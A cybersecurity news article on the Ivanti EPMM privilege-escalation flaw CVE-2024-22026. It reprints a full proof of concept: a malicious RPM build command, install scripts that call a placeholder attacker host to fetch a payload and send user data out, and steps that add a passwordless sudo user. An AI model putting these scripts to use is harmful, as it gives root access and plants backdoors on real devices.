PoC Exploit Released for Ivanti EPMM MobileIron Core

A newly disclosed vulnerability, CVE-2024-22026, has been found in Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core.

This vulnerability allows a local attacker to gain root access to affected systems.

The severity of this vulnerability is currently undetermined.

CVE-2024-22026: Local Privilege Escalation Vulnerability

The attack vector for CVE-2024-22026 is local, meaning the attacker must have local access to the system to exploit the vulnerability, as per reports by Github.

Once exploited, the attacker can gain root access, which provides full control over the system and can potentially lead to significant security breaches.

Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

Discovery

The device uses the following command as a low-privilege user to get and install RPM packages:

install rpm url <remote url>

This command is a CLI wrapper for the following to occur, which runs as root:

/bin/rpm -Uvh *.rpm

It’s possible to run any RPM package because the RPM command itself doesn’t check signatures or block URLs. An attacker can create a fake RPM package and send it to the device, making it vulnerable.

Exploitation PoCCreating the Malicious RPM

The following command is used to create a malicious RPM package:

fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .

Preinstall Script (preinstall.sh)

#!/bin/sh

curl -O http://<attacker_IP>/poc

exit 0

Postinstall Script (postinstall.sh)

#!/bin/sh

set -e  # Enable strict error checking

# Report back current user and privilege level

CURRENT_USER=$(whoami | base64)

PRIV_LEVEL=$(id -u | base64)

curl http://<attacker_IP>/poc?user=$CURRENT_USER

curl http://<attacker_IP>/poc?priv=$PRIV_LEVEL

# Create a new root user

if ! useradd -s /bin/sh -m exploit-poc; then

  echo "Failed to add user 'exploit-poc'" >&2

  exit 1

fi

echo "exploit-poc:<redacted_password>" | chpasswd

 # Grant root privileges

if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then

  echo "Failed to modify sudoers file" >&2

  exit 1

fi

exit 0

Running the CLI Command to Fetch the RPM: To take advantage of the flaw, the attacker would use the code below in the CLI to get the malicious RPM and install it:

install rpm url http://<attacker_IP>/ivanti-privesc-13.37-1.i386.rpm

Ivanti has released patches to address this vulnerability in versions 12.1.0.0, 12.0.0.0, and 11.12.0.1.

It is strongly recommended that users update these versions to mitigate the risk associated with CVE-2024-22026.

On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free

Divya is a Senior Journalist at Cyber Security news covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.